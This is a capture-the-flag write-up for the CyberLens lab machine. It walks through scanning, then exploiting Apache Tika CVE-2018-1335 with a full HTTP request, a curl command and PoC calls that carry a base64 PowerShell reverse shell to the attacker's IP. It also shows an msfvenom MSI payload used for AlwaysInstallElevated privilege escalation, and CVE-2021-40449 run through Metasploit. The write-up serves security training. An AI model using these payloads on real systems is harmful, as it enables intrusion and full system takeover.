CyberLens
Can you exploit the CyberLens web server and discover the hidden flags?
This work by Manav G Krishna is licensed under CC BY-NC 4.0
Machine IP
: 10.10.131.149
Nmap Scan
:
nmap -p- -v 10.10.131.149 --min-rate 100 -oN cyberlens_thm -Pn
Nmap scan report for cyberlens.thm (10.10.131.149)
Host is up (0.15s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64))
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-05-18T05:18:41+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Issuer: commonName=CyberLens
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-17T05:04:27
| Not valid after: 2024-11-16T05:04:27
| MD5: 0a8f:0621:514f:c425:d6c1:c704:82bf:3dbb
|_SHA-1: 9cc8:94c9:73db:50dc:215f:e168:4e54:f1d9:9554:9106
| rdp-ntlm-info:
| Target_Name: CYBERLENS
| NetBIOS_Domain_Name: CYBERLENS
| NetBIOS_Computer_Name: CYBERLENS
| DNS_Domain_Name: CyberLens
| DNS_Computer_Name: CyberLens
| Product_Version: 10.0.17763
|_ System_Time: 2024-05-18T05:18:33+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
61777/tcp open http Jetty 8.y.z-SNAPSHOT
| http-methods:
| Supported Methods: POST GET PUT OPTIONS HEAD
|_ Potentially risky methods: PUT
|_http-title: Welcome to the Apache Tika 1.17 Server
|_http-cors: HEAD GET
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=5/18%OT=80%CT=1%CU=30699%PV=Y%DS=2%DC=T%G=Y%TM=6648
OS:3A2F%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=S%
OS:TS=U)SEQ(SP=104%GCD=1%ISR=105%TI=I%CI=I%TS=U)SEQ(SP=104%GCD=1%ISR=105%TI
OS:=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=105%GCD=2%ISR=106%TI=I%CI=I%II=I%SS=S%TS=U
OS:)OPS(O1=M508NW8NNS%O2=M508NW8NNS%O3=M508NW8%O4=M508NW8NNS%O5=M508NW8NNS%
OS:O6=M508NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%D
OS:F=Y%T=80%W=FFFF%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z
OS:)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-18T05:18:36
|_ start_date: N/A
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 148.60 ms 10.11.0.1
2 149.53 ms cyberlens.thm (10.10.131.149)
Let us add cyberlens.thm
to the hosts
file as mentioned in the description of the room.
Command
:
sudo echo '10.10.131.149 cyberlens.thm' >> /etc/hosts
Instead of waiting for the scan to complete fully, we can navigate to the website on port 80
. As the verbose
switch is being used in the Nmap
command, we will straight away be able to see the ports as and when it is found.
Checking out Port 80
:

We can see what Wappalyzer
tells us:

The web server running is Apache 2.4.57
.
We have a contact form
here:

Testing out a basic XSS Payload
:

Now let's set up a netcat
listener on port 80
. If the above payload works we should be getting a connection back on our listener which basically shows that the server has reached out to our machine. The IP
specified in the payload is the tun0
interface IP
.

But unfortunately we don't get any connection on the listener.
Nothing out of the blue was found while directory busting
. No results were yielded from VHOST busting
.
There is a feature on the site called, CyberLens Image Extractor
:

Basically we can upload
files and the feature fetches the metadata
present within those files. Metadata is the hidden data
that accompanies every image, video, and file you encounter.
Checking out this feature by intercepting the request in BurpSuite
:
After turning on the intercept in Burp
we just have to upload a file and click on the Get Metadata
button and the request will get captured in Burp
:


Forward
the above request and we will be on the one that we need:

This shows that the metadata extraction
takes place on port 61777
. We can now check out the Nmap
scan that would have completed fully by now and can also check out the website on that port:


We can see that it is using Apache Tika 1.17
. It is an open-source software library that detects and extracts metadata
and structured text
from a variety
of file formats. This is what is being used to fetch the metadata
from the files that we upload in the CyberLens Image Extractor
feature.
We can confirm the same by looking at the metadata
it extracts, mainly checking out the Parsing headers
, have uploaded a pdf file this time:

And also the endpoint as seen from the request is /meta
and this is where our request post clicking on Get Metadata
is being sent to, data is being PUT
to the server:

Now that we fully know what exactly is happening, we can try to find out exploits for - Apache Tika 1.17
and this leads us to CVE-2018-1335
.
CVE-2018-1335 - Command Injection in Apache Tika
:
Note
:
I will be showing 3
ways to get the foothold
by exploiting the above mentioned CVE
. First way being doing it manually
, second way via the POC (python script)
and the final way via Metasploit
.
Manual Exploitation to get a Reverse Shell
:
Towards the end of the above attached blog, we find this:

Based on this, we have to include a a few headers
, change the content-type and also have to add the JS
code in the body of the request.
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c calc.exe');
Apparently what these two JS
lines are doing is, firstly it is creating a WScript.Shell object
, which provides access to Windows shell
functionalities. WScript
is used to interpret and execute scripts written in scripting languages such as VBScript
and JScript
and secondly this object is being used to run the command cmd /c calc.exe
, which opens up Calculator
of the target machine.
The command can be modified by us to get a reverse shell
instead.
Base64 Encoded PS Reverse Shell
:

Setting up a listener on port 445
:

Final Request
:
The extra headers
include:
X-Tika-OCRTesseractPath: "cscript"
X-Tika-OCRLanguage: //E:Jscript
And also the Content-Type
has to be changed to image/jp2
.
The request body
:
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=');
PUT /meta HTTP/1.1
Host: cyberlens.thm:61777
Content-Type: image/jp2
X-Tika-OCRTesseractPath: "cscript"
X-Tika-OCRLanguage: //E:Jscript
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=');

The same can be done through curl
too:
Command
:
curl -X PUT http://cyberlens.thm:61777/meta \
-H "Content-Type: image/jp2" \
-H 'X-Tika-OCRTesseractPath: "cscript"' \
-H 'X-Tika-OCRLanguage: //E:Jscript' \
--data '
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('\''cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='\'');
'
We just send the request and we can check out the listener:

Now we have successfully got a shell as the user cyberlens
and we can get the user flag in this user's Desktop
folder.
Using POC to get a Reverse Shell
:

Command
:
python3 exploit.py cyberlens.thm 61777 'cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='
The Base64 Encoded PS Payload
is what is being used here too.
We have now got the shell:

Using Metasploit
:
Command
:
msfconsole -q //This starts metasploit in quite mode, that is it doesn't print out the banner

Setting the options
:
Running systeminfo
from the shell that we previously got from the above mentioned ways, gives us the type:
Command
:
systeminfo | findstr /B /C:"System Type"

It is a 64-bit
machine. So while setting the payload option we would have to set a 64-bit
payload.


Now we just run
the exploit:

Yet again, we have a shell.
Let us see if we can do some enumeration
and find if passwords
of any users are stored in files
etc, which is a pretty common thing that is found in real world pentests
too. Let us check out a few common
file types that passwords could be stored in such as .txt
, .xml
, .ini
etc.
We can firstly look within CyberLens's home
folder
Command
:
Get-ChildItem -Path . -Recurse -Include *.txt,*.xml,*.ini

There is a file called CyberLens-Management.txt
.
Let us check it out:

And indeed we find CyberLens's
password.
Also the Nmap
scan shows us that port 3389
is open. Let us confirm we if can RDP
in as CyberLens
:
Command
:
netexec rdp cyberlens.thm -u CyberLens -p 'insert_password'

NetExec
says Pwn3d!
. This means the creds are valid
and we can RDP
in.
Note
:
RDP
ing is not needed
considering we already have a shell
as CyberLens
. Below shown are the steps to follow if you want to try it out.
Command
:
xfreerdp /u:CyberLens /p:'insert_password' /v:cyberlens.thm /dynamic-resolution


We have got in.
Privilege Escalation to SYSTEM (Intended Way)
:
We can firstly check if Windows Defender
is running or not:
Command
:
sc.exe query WinDefend

We can see that the STATE
is STOPPED
, which means Defender
is not
runnning.
Now let us use WinPEAS
on the machine by serving it via a python server
and a 64-bit WinPEAS
is what we need as the target system is 64-bit
.
We can write to the home
folder or Desktop
folder of the user CyberLens
as we have Full Control (F)
in these locations:

Command
:
IWR -Uri http://10.11.75.84:4545/winPEASx64.exe -OutFile winPEASx64.exe


Running WinPEAS
:

We then come across this:

We can see that the AlwaysInstallElevated Policy
is set to 1 (Enabled)
for both HKLM (HKEY_LOCAL_MACHINE)
& HKCU (HKEY_CURRENT_USER)
registry hives. This policy allows non-administrative users
to install
software with elevated privileges
. In this case it is enabled globally (for all users) as well as for the current user on the system.
This policy allows a regular user
to install MSI
files with high/elevated
privileges.
Manually
enumerating the status of AlwaysInstallElevated
:
Commands
:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

This can be abused by us in order to escalate privileges
to become SYSTEM
by crafting a malicious MSI
file.

We can create a .msi
payload using msfvenom
and this can be served via a python server
.
Command
:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.75.84 LPORT=443 -a x64 --platform windows -f msi -o evil.msi

Command
:
IWR -Uri http://10.11.75.84:4545/evil.msi -OutFile evil.msi


Now let us setup a listener on port 443
:

Running the bad MSI
file:
Command
:
msiexec.exe /i evil.msi

Now let us check out our listener:

We have successfully got a shell as SYSTEM
. The admin flag
can be found in the Desktop
folder of Administrator
.
The same can be done via Metasploit
too (exploit/windows/local/always_install_elevated
).
Privilege Escalation to SYSTEM (Unintended Way)
:
Let us check out the OS Version
on the machine:
Command
:
systeminfo | findstr /B /C:"OS Version"

It is 10.0.17763 N/A Build 17763
. We can now check out exploits for the same
And we get this in one of the results:


It is a LPE (Privilege Escalation)
exploit.
CVE-2021-40449 (Win32k - LPE)
:
We can check out the repo:

We can see that the exact version
that we have on the target
is vulnerable
to this LPE
exploit.
This can be used to get to SYSTEM
.
The repo doesn't have
pre-compiled binaries. The .sln
file has to be compiled to an .exe
file and this can be achieved by using Visual Studio
. There are other ways to do it too, but it is a lengthy procedure
. Instead we can exploit this in an easier
way using Metasploit
.
Note
:
We can use the meterpreter shell
that we had got by exploiting the Apache Tika CVE
initially to run the above mentioned LPE
exploit or we can use the web_delivery
exploit in the shell that we got by manually
exploiting the Tika CVE
. The easier
and the more practical way of getting a meterpreter
shell would be through web_delivery
. But in this case since we have a meterpreter
shell from before, I will be using that as it is a shell obtained in the context
of this machine and mainly cause you have the option
to choose
which way you would like to follow to get to SYSTEM
. Also for the LPE
exploit, a couple repo's containing the pre built binary was found but they didn't work
.
Getting the shell as CyberLens by exploiting CVE-2018-1335
:

CVE-2021-40449 Exploitation
:

The initial meterpreter
shell is backgrounded
(bg
) so that it can be used with the exploit.

Setting the options
:
We have to firstly set the SESSION
, which is basically the initial shell that we had obtained. This is how the exploit module knows where to perform the LPE
exploit on.

Note
:
The SESSION
count is 3
for me as this is the 3rd session
that I have opened. This won't
be the same in your case, it depends on how many sessions were opened before using the Apache Tika Metasploit
exploit. Make sure to type in the meterpreter
command - sessions
to find out your current session ID
.

We had left the LPORT
to the default setting of port 4444
initially while performing the Tika
exploit via Metasploit
. Now we would have to use a different LPORT
for the exploit to listen on, so we can set it to 5555
.
Now we just run
the exploit:

We are SYSTEM
again.
We could also find the LPE
exploit in a simpler way through the meterpreter
shell itself by using Metasploit's Lester (Local Exploit Suggester)
:
This module
scans the system and it finds
and lists
out possible vulnerabilities
.
Command
:
run post/multi/recon/local_exploit_suggester

Note
:
All exploits mentioned by the suggester
were tried out but the only one that worked was CVE-2021-40449
. Also there are multiple post exploitation
recon tools like Lester
that yields the same result as shown above.
Room solved!!
Last updated